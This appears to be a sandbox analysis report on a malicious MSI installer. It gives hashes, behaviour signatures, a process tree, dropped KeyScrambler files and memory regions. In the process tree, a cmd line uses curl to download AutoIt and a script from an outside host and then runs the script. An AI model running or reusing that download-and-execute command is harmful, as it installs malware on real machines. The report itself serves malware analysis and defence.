Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    10-10-2023 13:04

General

  • Target

    f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi

  • Size

    660KB

  • MD5

    8e68a2869daf1ba9eaebf31d2d87973e

  • SHA1

    739627919a7d4b972454158911edce0106eb5df0

  • SHA256

    f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2

  • SHA512

    35997befc485f7491e5e0fd0cb50a3e5a2f7111638eeb58d36498f68c48d380d9c08d2d03f8c49cc0300830438550e2fb7fa3ac4f9f1bcede2bcad3f3b14f513

  • SSDEEP

    12288:ntvRQ+gjpjegGdo8kgLKxBTi9byLw2wHvHgU3qfrbDW:ntncpVGPkgtyLHw33qjbD

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 10 IoCs
  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\f479112f0f56f314af5aada9e84225ff60b6d68d2271850a442494205db0e6e2.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2620
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding A73C272E8947C186F4248C2417806E54
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:2484
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:472
      • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c cd /d %temp% & curl -o Autoit3.exe http://piret-wismann.com:2351 & curl -o cztngt.au3 http://piret-wismann.com:2351/cztngt & Autoit3.exe cztngt.au3
          4⤵
            PID:2708
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 164
            4⤵
            • Loads dropped DLL
            • Program crash
            PID:2776
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1636
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000004B0" "0000000000000578"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:1404

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07298EE8EBA9732300AE62BDCA6B6898

      Filesize

      1KB

      MD5

      e11e31581aae545302f6176a117b4d95

      SHA1

      743af0529bd032a0f44a83cdd4baa97b7c2ec49a

      SHA256

      2e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c

      SHA512

      c63aba6ca79c60a92b3bd26d784a5436e45a626022958bf6c194afc380c7bfb01fadf0b772513bbdbd7f1bb73691b0edb2f60b2f235ec9e0b81c427e04fbe451

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8555326CC9661C9937DC5053B6C38763

      Filesize

      1KB

      MD5

      866912c070f1ecacacc2d5bca55ba129

      SHA1

      b7ab3308d1ea4477ba1480125a6fbda936490cbb

      SHA256

      85666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69

      SHA512

      f91e855e0346ac8c3379129154e01488bb22cff7f6a6df2a80f1671e43c5df8acae36fdf5ee0eb2320f287a681a326b6f1df36e8e37aa5597c4797dd6b43b7cf

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07298EE8EBA9732300AE62BDCA6B6898

      Filesize

      312B

      MD5

      8e836d45a6e9b62df809f1caa5103c04

      SHA1

      b6bcc3ea55148c94bfabed542577aff8ec115722

      SHA256

      c6b348c38b6ac9847a39c2d1735571391f4f80f46c1b2b565e7c6ba350f24627

      SHA512

      0f65b7c633a4d3ab524c3495c1731dc668569bf8b387ad1c08e692e71862634c836189636a408671e1bd9c2511c21b57dfff050d31cbe70adcb27a8b2b870a83

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8555326CC9661C9937DC5053B6C38763

      Filesize

      326B

      MD5

      038c40efb33d72377a287b4312fb49d5

      SHA1

      f516f283c6d4b2f9687630d1059ae225251e4368

      SHA256

      b79d39b55e78387c9a3efd1101726e3fe38f610bdf3f89d743afcd9ad51b375f

      SHA512

      d1ccce0c1e8d736b86c2ffa84513a5e9d453528ae2d52617f7bf7f4e9e2bb18df7e8aa238d4ef084d70bd8bff42279fa8fea6e96d416ed95c46adabc36940ae8

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      304B

      MD5

      252e41058761904ac6a9ba202011fe8e

      SHA1

      ece912df95aa0bd293fd7e4a8399e41306dbf98c

      SHA256

      2f93e94892008cf4a52d2e9a1d87fc9034a0528d5363d31412acd459e3361572

      SHA512

      5f4d573481a46464036418814bb5d54eccd0ad0f7990e610425db7d71ee7ce19ecad3b65871bacd2b25aefbf55037e6b71b7bae00ee40cacaad4ba9a964a908a

    • C:\Users\Admin\AppData\Local\Temp\Cab761C.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files.cab

      Filesize

      403KB

      MD5

      3a268087f8f162c60aa24d4fb9bd1b2b

      SHA1

      b942dd465d2044953fb3ef9eb91f1d6138101687

      SHA256

      53beb7204377b417d7439b84bdaee22a6c72eeb3fd1579dde8e0ad69506188c3

      SHA512

      eadd2b867b5b352b866361546d5265d332c669ceff70bd375a703a1ee0b9e2e64c5d4e66c437854308427f7285efd101d4f85356e03ed1c5a7c5a76a3e0a9613

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerIE.DLL

      Filesize

      454KB

      MD5

      9e0ae735a86eb8f0dc472f267ebbb74c

      SHA1

      53ff35f13620da5a432cd5dfac933749f070b74d

      SHA256

      6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

      SHA512

      b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\msiwrapper.ini

      Filesize

      1KB

      MD5

      b5e42487634d798b6bdf4c907a9a6021

      SHA1

      dad2e82742e29fe61947b32f54564796b8e9a04e

      SHA256

      cde38ccf33bb7d41e2b077001ada0fd4023620664c6d0b0933e4ab418535ab2e

      SHA512

      5845fdf65e38755d288839e786ef04f8be0ac6c6dd9a14b48f8615087b022f8f2ed5b9db09bd4b7b1560479091fba9be9e4611179e9a0f7c6874bcf0cad24e96

    • C:\Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\msiwrapper.ini

      Filesize

      1KB

      MD5

      b5e42487634d798b6bdf4c907a9a6021

      SHA1

      dad2e82742e29fe61947b32f54564796b8e9a04e

      SHA256

      cde38ccf33bb7d41e2b077001ada0fd4023620664c6d0b0933e4ab418535ab2e

      SHA512

      5845fdf65e38755d288839e786ef04f8be0ac6c6dd9a14b48f8615087b022f8f2ed5b9db09bd4b7b1560479091fba9be9e4611179e9a0f7c6874bcf0cad24e96

    • C:\Users\Admin\AppData\Local\Temp\Tar7728.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Windows\Installer\MSIDE7C.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerIE.dll

      Filesize

      454KB

      MD5

      9e0ae735a86eb8f0dc472f267ebbb74c

      SHA1

      53ff35f13620da5a432cd5dfac933749f070b74d

      SHA256

      6978c0e3b06bc11cd7ac954c71fb9a2ee318433b2f46ec45234d7a13e55f812a

      SHA512

      b6cdc0222eca0acccdb4a3407fdbb9ab50508f82e95ef6d6e5129232d78c3ef39a8ddda05856469ca9fb7def1e65378b6d875971f95fd604a7b0681816cce222

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Users\Admin\AppData\Local\Temp\MW-70e6a391-7b3e-4baa-a292-8b52e9daa149\files\KeyScramblerLogon.exe

      Filesize

      500KB

      MD5

      c790ebfcb6a34953a371e32c9174fe46

      SHA1

      3ead08d8bbdb3afd851877cb50507b77ae18a4d8

      SHA256

      fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1

      SHA512

      74e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554

    • \Windows\Installer\MSIDE7C.tmp

      Filesize

      208KB

      MD5

      d82b3fb861129c5d71f0cd2874f97216

      SHA1

      f3fe341d79224126e950d2691d574d147102b18d

      SHA256

      107b32c5b789be9893f24d5bfe22633d25b7a3cae80082ef37b30e056869cc5c

      SHA512

      244b7675e70ab12aa5776f26e30577268573b725d0f145bfc6b848d2bd8f014c9c6eab0fc0e4f0a574ed9ca1d230b2094dd88a2146ef0a6db70dbd815f9a5f5b

    • memory/1644-332-0x0000000000130000-0x00000000001A6000-memory.dmp

      Filesize

      472KB

    • memory/1644-334-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/1644-341-0x0000000000130000-0x00000000001A6000-memory.dmp

      Filesize

      472KB

    • memory/1644-342-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB